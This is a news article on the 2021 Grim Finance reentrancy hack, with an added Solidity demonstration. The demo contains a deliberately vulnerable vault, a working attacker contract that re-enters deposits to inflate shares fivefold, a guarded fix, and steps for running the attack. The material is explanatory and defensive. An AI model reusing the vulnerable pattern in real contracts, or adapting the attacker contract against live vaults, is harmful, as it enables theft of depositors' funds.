DeFi project Grim Finance has become the latest victim in the crypto space after being hit by an ‘advanced attack’. The attack resulted in Grim Finance losing over $30 million in crypto tokens.
Hello Grim Community,
It is with heavy hearts that we inform you that our platform was exploited today by an external attacker roughly 6 hours ago. The attacker's address has been identified with over 30 million dollars worth of theft here https://t.co/qA3iBTSepb
— Grim Finance (@financegrim) December 19, 2021
Built on the Fantom Opera blockchain, Grim Finance lets users deposit the liquidity provider (LP) tokens they receive from decentralized exchanges into vaults that earn additional yield on them. Fantom Opera is an EVM-compatible smart-contract platform, so its contracts are written in Solidity, the same language used on Ethereum.
Grim Finance has temporarily suspended all its vaults to avoid further attacks and has called on users to withdraw their funds immediately. “The exploit was found in the vault contract so all of the vaults and deposited funds are currently at risk,” the protocol tweeted Sunday. It further noted:
“We have contacted and notified Circle (USDC), DAI, and AnySwap regarding the attacker address to potentially freeze any further fund transfers.”
According to reports, the attacker exploited a reentrancy vulnerability in the vault's deposit logic: by re-entering the deposit function while the original deposit transaction was still executing, the attacker had a single deposit counted multiple times, in effect registering fake additional deposits. DeFi monitoring group Rugdoc.io pointed out that the vault should have used a reentrancy guard to prevent such nested calls.
1) The culprit? A before-after pattern without reentrancy guard. This is a big no-no.
Read the following posts for the full explanation. pic.twitter.com/y4aPkLJHfU
— Rugdoc.io (@RugDocIO) December 18, 2021
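The "before-after pattern" Rugdoc refers to is a vault that credits shares from the difference between its token balance before and after an external transfer call. The following is an added illustration of that pattern and of its guarded form; it is not Grim Finance's contract, not the attacker's code, and not a reconstruction of the actual exploit. The contract and function names (VulnerableVault, HostileToken, HardenedVault, depositFor, attack), the recursion depth, and the simplified one-share-per-token accounting are all assumptions made for the demo.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Illustrative example only. Names and accounting are assumptions for
// this demo, not Grim Finance's code.

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
}

// Vulnerable shape: the share credit is computed from a balance snapshot
// taken before an external call and a second one taken after it, and the
// contract called in between is chosen by the caller. Nothing stops that
// contract from re-entering depositFor() before the first call finishes.
contract VulnerableVault {
    IERC20 public immutable want;              // the LP token this vault holds
    mapping(address => uint256) public shares;
    uint256 public totalShares;

    constructor(IERC20 _want) { want = _want; }

    function depositFor(address token, address user, uint256 amount) external {
        uint256 before = want.balanceOf(address(this));
        // External call to a caller-supplied contract: re-enterable.
        IERC20(token).transferFrom(msg.sender, address(this), amount);
        // Every nesting level takes this reading after the real tokens arrive,
        // so every level sees the same positive delta and credits it again.
        uint256 delta = want.balanceOf(address(this)) - before;
        shares[user] += delta;
        totalShares += delta;
    }
}

// A "token" whose transferFrom() re-enters the vault instead of moving funds.
// Only the innermost call moves real LP tokens; the outer levels each credit
// the same delta, so one deposit of `amount` yields 5 * amount shares.
contract HostileToken {
    VulnerableVault public immutable vault;
    IERC20 public immutable want;
    address public immutable owner;
    uint256 private depth;

    constructor(VulnerableVault _vault, IERC20 _want) {
        vault = _vault;
        want = _want;
        owner = msg.sender;
    }

    // Caller must first fund this contract with `amount` of the real LP token.
    function attack(uint256 amount) external {
        require(msg.sender == owner, "not owner");
        vault.depositFor(address(this), owner, amount);
    }

    function transferFrom(address, address, uint256 amount) external returns (bool) {
        require(msg.sender == address(vault), "only vault");
        if (depth < 4) {
            depth++;                                         // re-enter four more times
            vault.depositFor(address(this), owner, amount);
        } else {
            want.transfer(address(vault), amount);           // the one real deposit
        }
        return true;
    }
}

// Guarded shape: a mutex (the same scheme as OpenZeppelin's ReentrancyGuard)
// makes the nested call revert, and the vault only ever calls its own `want`
// token, so the caller cannot inject a hostile contract into the call path.
contract HardenedVault {
    IERC20 public immutable want;
    mapping(address => uint256) public shares;
    uint256 public totalShares;
    uint256 private locked = 1;                // 1 = free, 2 = in a call

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    constructor(IERC20 _want) { want = _want; }

    // Before-after accounting is still useful (fee-on-transfer tokens), but it
    // is now safe: no re-entry, and no caller-chosen contract in the middle.
    function deposit(uint256 amount) external nonReentrant {
        uint256 before = want.balanceOf(address(this));
        want.transferFrom(msg.sender, address(this), amount);
        uint256 delta = want.balanceOf(address(this)) - before;
        shares[msg.sender] += delta;
        totalShares += delta;
    }
}
```

To see the difference, deploy VulnerableVault against a real LP token, fund a HostileToken with `amount` of that token, and call `attack(amount)`: `shares[owner]` ends at five times `amount` although the vault received `amount` once. Against HardenedVault the same nesting is impossible, because the second call into `deposit()` hits the `locked == 2` check and the whole transaction reverts. The guard alone is enough to stop the recursion, but the deeper fix is the second change: a deposit path should only ever call the token the vault actually accounts for, never a contract address the caller hands in.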
“Hopefully all projects can draw lessons from this incident that there is much knowledge most experienced solidity devs have at hand. If you haven’t acquired this yet, don’t build multi-million dollar projects. Don’t get audits from companies which everyone knows are useless,” Rugdoc.io tweeted.